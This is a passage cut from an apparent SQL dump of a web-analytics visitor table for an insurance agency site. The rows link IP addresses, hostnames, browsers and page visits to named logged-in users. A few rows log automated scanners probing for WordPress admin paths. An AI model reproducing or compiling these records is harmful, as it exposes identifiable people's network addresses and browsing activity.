1080','','','','SimkowitzCo','','0','0',0),(14466,'0b_d268122b66812b2aae79b42f207b1a1b','1460042589','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14469,'0b_d268122b66812b2aae79b42f207b1a1b','1460042595','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14471,'0b_7745f498921e3adbf6b39cbd192d5dac','1460044004','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14472,'0b_c0efd7e07eb51824540c8e3aee564aba','1460044520','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14474,'0b_c0efd7e07eb51824540c8e3aee564aba','1460044522','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14477,'0b_c0efd7e07eb51824540c8e3aee564aba','1460044526','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14478,'0b_fe168f41b88ef993578742c3f240f3f1','1460044577','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0; MDDRJS)','','',0,'Win7 x64','IE 10','us','','','','','','','0','0',0),(14480,'0b_9a391f627902d1598f048ea692282060','1460044579','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0; MDDRJS)','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 10','us','1829 x 1029','','','','SimkowitzCo','','0','0',0),(14483,'0b_c0efd7e07eb51824540c8e3aee564aba','1460044586','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14486,'0b_6101fc3ffe65cdc6e3c5dd0f3a9269cf','1460045850','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14489,'0b_6101fc3ffe65cdc6e3c5dd0f3a9269cf','1460045851','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14490,'0b_7745f498921e3adbf6b39cbd192d5dac','1460046685','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14493,'0b_7745f498921e3adbf6b39cbd192d5dac','1460046686','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14495,'0b_c03876a8b59320f5aedf939486b0e9b4','1460047662','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14498,'0b_c03876a8b59320f5aedf939486b0e9b4','1460047663','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14499,'0b_c03876a8b59320f5aedf939486b0e9b4','1460047676','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14502,'0b_c03876a8b59320f5aedf939486b0e9b4','1460047685','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(14504,'0b_e5cf1451e372b587be3dfc3a0bdf47da','1460047998','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(14507,'0b_e5cf1451e372b587be3dfc3a0bdf47da','1460047999','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(14508,'0b_7745f498921e3adbf6b39cbd192d5dac','1460048517','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14511,'0b_7745f498921e3adbf6b39cbd192d5dac','1460048518','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14514,'0b_7745f498921e3adbf6b39cbd192d5dac','1460048525','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14517,'0b_7745f498921e3adbf6b39cbd192d5dac','1460048526','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14519,'0b_2c73c680a8507243db8a85148cfab582','1460048915','159.53.110.141','159.53.110.141','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiG4a-Cgv3LAhVIs4MKHc0PBNcQFggdMAA&url=http%3A%2F%2Fwww.empireins.com%2Fmeet-the-eib-team%2F&usg=AFQjCNFOb2zx9dj5NajK0tLdcu2vBluCuQ','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14520,'0b_2c73c680a8507243db8a85148cfab582','1460048926','159.53.110.141','159.53.110.141','/meet-the-eib-team/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/meet-the-eib-team/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14522,'0b_2c73c680a8507243db8a85148cfab582','1460048927','159.53.110.141','159.53.110.141','/comments/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/meet-the-eib-team/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14525,'0b_2c73c680a8507243db8a85148cfab582','1460048936','159.53.110.141','159.53.110.141','/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/meet-the-eib-team/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14528,'0b_2c73c680a8507243db8a85148cfab582','1460048936','159.53.110.141','159.53.110.141','/?p=347','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/meet-the-eib-team/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14529,'0b_7745f498921e3adbf6b39cbd192d5dac','1460049592','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14531,'0b_7745f498921e3adbf6b39cbd192d5dac','1460049593','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14534,'0b_4c9744fb1c05c02016b8a0888f5c355e','1460049859','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14535,'0b_4c9744fb1c05c02016b8a0888f5c355e','1460049861','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14538,'0b_7745f498921e3adbf6b39cbd192d5dac','1460050385','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14541,'0b_7745f498921e3adbf6b39cbd192d5dac','1460050387','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14543,'0b_e30f45251aa96a5499849d45a45bb4c9','1460051027','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(14544,'0b_e30f45251aa96a5499849d45a45bb4c9','1460051029','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(14546,'0b_e30f45251aa96a5499849d45a45bb4c9','1460051032','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(14549,'0b_e30f45251aa96a5499849d45a45bb4c9','1460051039','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(14550,'0b_ba947afb41f40ac00813e8fb120e2eff','1460051333','158.199.144.10','aa131.secure.ne.jp','/wp-admin/','','','',0,'','','jp','','','Unknown Spider','','','','0','0',0),(14552,'0b_7745f498921e3adbf6b39cbd192d5dac','1460051574','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14553,'0b_7745f498921e3adbf6b39cbd192d5dac','1460051574','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14555,'0b_1df749c3eb7f386b5bc470f4ebc62e46','1460051733','74.126.55.206','74.126.55.206','/','Mozilla','','',0,'','','','','','','','','','0','0',0),(14558,'0b_e0d64ede6056ea132af14d2e0cdf6887','1460051784','216.156.135.58','216.156.135.58.ptr.us.xo.net','/test/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(14559,'0b_1ed0eccf8916810bbd4e3da0543a6341','1460052690','50.87.63.37','50-87-63-37.unifiedlayer.com','/blog/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(14562,'0b_94fdf1556ae112db056e0c476b482740','1460052924','207.97.167.53','207.97.167.53','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'MacOSX','Chrome 49','us','','Google','','','','','0','0',0),(14564,'0b_94fdf1556ae112db056e0c476b482740','1460052935','207.97.167.53','207.97.167.53','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 49','us','','','','','','','0','0',0),(14565,'0b_80c823308b18497ed1615150505f7cb1','1460053161','65.110.13.11','65.110.13.11.colo.970-b12.cipherkey.net','/wp/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(14567,'0b_a76b815d04c1022c394fea9f06594036','1460053437','47.16.162.38','ool-2f10a226.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.bing.com/search?q=empireins.co&form=IE11TR&src=IE11TR&pc=DCJB','empireins.co',1,'Win8 x64','IE 11','us','1366 x 768','Bing','','','','','0','0',0),(14568,'0b_a76b815d04c1022c394fea9f06594036','1460053438','47.16.162.38','ool-2f10a226.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(14571,'0b_a76b815d04c1022c394fea9f06594036','1460053440','47.16.162.38','ool-2f10a226.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(14574,'0b_a76b815d04c1022c394fea9f06594036','1460053452','47.16.162.38','ool-2f10a226.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(14577,'0b_7971a4571af57dcbb42f4f9fcb4676fc','1460053563','64.71.32.13','lsh1003.lsh.siteprotect.com','/old/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(14580,'0b_e9370b047b7628dc2626ddb4cc48f9c7','1460054048','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(14582,'0b_e9370b047b7628dc2626ddb4cc48f9c7','1460054048','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(14583,'0b_e9370b047b7628dc2626ddb4cc48f9c7','1460054049','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(14586,'0b_e9370b047b7628dc2626ddb4cc48f9c7','1460054128','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(14588,'0b_e9370b047b7628dc2626ddb4cc48f9c7','1460054135','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(14591,'0b_652c50b16f4b3d732d5d2ca18586693a','1460054968','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(14592,'0b_ae4e9555481879d5d03907e405fffdf8','1460056250','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14595,'0b_ae4e9555481879d5d03907e405fffdf8','1460056252','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14597,'0b_d268122b66812b2aae79b42f207b1a1b','1460056584','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(14600,'0b_d268122b66812b2aae79b42f207b1a1b','1460056592','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14603,'0b_d268122b66812b2aae79b42f207b1a1b','1460056596','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14604,'0b_ae4e9555481879d5d03907e405fffdf8','1460056960','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14607,'0b_ae4e9555481879d5d03907e405fffdf8','1460056961','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14609,'0b_ae4e9555481879d5d03907e405fffdf8','1460056978','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14610,'0b_ae4e9555481879d5d03907e405fffdf8','1460056979','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14612,'0b_ae4e9555481879d5d03907e405fffdf8','1460057029','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','51',0),(14613,'0b_ae4e9555481879d5d03907e405fffdf8','1460057030','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14615,'0b_e9370b047b7628dc2626ddb4cc48f9c7','1460057353','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(14616,'0b_81add2c5f1324f9f0094ab1e184938f5','1460057388','66.87.133.4','66-87-133-4.pools.spcsdns.net','/meet-the-eib-team/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1','https://www.google.com/','_notprovided_',1,'iPhone OS','Safari 9 Mobile','us','','Google','','','','','0','0',0),(14618,'0b_e9370b047b7628dc2626ddb4cc48f9c7','1460057398','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(14621,'0b_e9370b047b7628dc2626ddb4cc48f9c7','1460057407','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(14622,'0b_d268122b66812b2aae79b42f207b1a1b','1460057425','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14624,'0b_d268122b66812b2aae79b42f207b1a1b','1460057429','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14627,'0b_7745f498921e3adbf6b39cbd192d5dac','1460058421','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14630,'0b_7745f498921e3adbf6b39cbd192d5dac','1460058835','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14631,'0b_7745f498921e3adbf6b39cbd192d5dac','1460060334','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14633,'0b_7745f498921e3adbf6b39cbd192d5dac','1460060335','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14634,'0b_d268122b66812b2aae79b42f207b1a1b','1460061117','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14636,'0b_d268122b66812b2aae79b42f207b1a1b','1460061125','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14639,'0b_1b02885aea7a499a5664404fe9521bec','1460063422','70.39.157.192','70.39.157.192','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(14642,'0b_4247ed0ff4f4fae85df9d07ce146b1da','1460065026','66.249.88.60,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(14643,'0b_c161840360460d965166f98e9eb82511','1460065043','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14646,'0b_c161840360460d965166f98e9eb82511','1460065044','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14649,'0b_95c6fae7823c8691b8d9ef34a0aa7699','1460065706','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(14652,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460065756','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(14654,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460065772','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 